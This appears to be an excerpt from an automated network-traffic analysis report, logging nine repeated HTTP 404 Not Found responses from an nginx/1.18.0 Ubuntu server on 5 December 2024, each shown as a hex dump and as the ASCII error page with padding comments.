Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0 (Ubuntu)Date: Thu, 05 Dec 2024 16:32:41 GMTContent-Type: text/htmlContent-Length: 564Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0 (Ubuntu)Date: Thu, 05 Dec 2024 16:32:44 GMTContent-Type: text/htmlContent-Length: 564Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0 (Ubuntu)Date: Thu, 05 Dec 2024 16:32:46 GMTContent-Type: text/htmlContent-Length: 564Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0 (Ubuntu)Date: Thu, 05 Dec 2024 16:32:49 GMTContent-Type: text/htmlContent-Length: 564Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0 (Ubuntu)Date: Thu, 05 Dec 2024 16:32:51 GMTContent-Type: text/htmlContent-Length: 564Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0 (Ubuntu)Date: Thu, 05 Dec 2024 16:33:15 GMTContent-Type: text/htmlContent-Length: 564Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0 (Ubuntu)Date: Thu, 05 Dec 2024 16:33:19 GMTContent-Type: text/htmlContent-Length: 564Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0 (Ubuntu)Date: Thu, 05 Dec 2024 16:33:23 GMTContent-Type: text/htmlContent-Length: 564Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0 (Ubuntu)Date: Thu, 05 Dec 2024 16:33:26 GMTContent-Type: text/htmlContent-Length: 564Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
